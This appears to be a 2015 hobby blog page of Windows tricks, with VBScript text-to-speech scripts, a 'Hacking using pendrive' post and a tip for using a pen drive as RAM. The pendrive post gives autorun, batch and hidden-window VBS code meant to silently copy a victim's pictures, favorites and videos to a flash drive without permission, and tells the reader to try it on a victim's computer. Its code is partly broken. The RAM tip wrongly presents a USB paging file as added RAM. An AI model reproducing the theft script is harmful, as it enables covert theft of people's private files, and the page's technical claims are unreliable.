Saturday, 22 August 2015

Make your Computer Welcome You

Hello Everyone,
  If you want Make your Computer Welcome You then, use this trick, follow the instructions given below:-


Steps
  1. Open Notepad.
  2. Copy and paste the exact code given below.  
  3. Dim speaks, speech speaks="Welcome to your PC, Username" Set speech=CreateObject("sapi.spvoice") speech.Speak speaks

  4. Replace Username with your own name.
  5.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
  6. Copy the saved file.
  7. Navigate to

    For Window XP: C:\Documents and Settings\All Users\Start Menu\Programs\Startup 

     and For Windows 8, Windows 7 and Windows Vista: C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

    if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.

  8.  Paste the file.
Now when the next time you start your computer, Windows will welcome you in its own computerized voice.

Make your Computer Talk

Hello Everyone,
  If you want to create one such talk script, follow the steps given below.


Steps
  1. Open Notepad.
  2. Copy and paste the exact code given below.  
  3. Dim Message, Speak Message=InputBox("Enter text","Speak") Set Speak=CreateObject("sapi.spvoice") Speak.Speak Message

  4. Click on File MenuSave As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
  5. Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK.
That's it your Software for Speaking your Text to read.

   

Hacking using pendrive

This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice.

Process is very simple as we have to add only 4-5 notepad files in the flash drive.
Follow the following steps :-

1. Create a notepad file with name 
autorun.inf nad copy the following code.



[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
2. Create another notepad file of name file.bat and copy the following code.

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls
3. In our 3rd notepad file, copy the following code and save it as invisible.vbs


CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False

4. And in our last notepad file, copy this code and save the file as 
launch.bat


 wscript.exe \invisible.vbs file.bat

5. Now, copy all this 4 files in the root of  flash drive. And create a folder "all" where the content is to be copy.

6. Test this in your own computer first, before inserting this flash drive in victim's computer.


This code is writen by hacking using pendrive site click for more detail.

Want to Use Your Pen Drive As RAM ?

Hello Everyone,
If you want to use your Pen Drive as a RAM of your PC or Laptop then just use given below steps. 
  1. Insert the Pen Drive with 1GB at least in the USB Port, better to prefer 4GB.
  2. Right click on My Computer--> Properties--> Advanced system settings.
  3. Advanced--> Performance Settings.
  4. Advanced--> Change.
  5. Dis Select Automatically manage paging file size for all drives paging file size for each drive.
  6. Select your pen Drive (Suppose your pen drive is in G Drive Then Select G). 
  7. Click on Custom Size.  "Check the value of space available"
  8. Enter the same in the Initial and Max columns. "Here you just used the space of Pen Drive as a Virtual Memory".
  9. Now restart your PC.

Finally check the general start up time and also speed of your PC. So, you can have a high speed system in low cost.

Here Your pen drive is now a RAM you can Check your RAM Size using My Computer--> Properties Location.
That's it...

Search on This Blog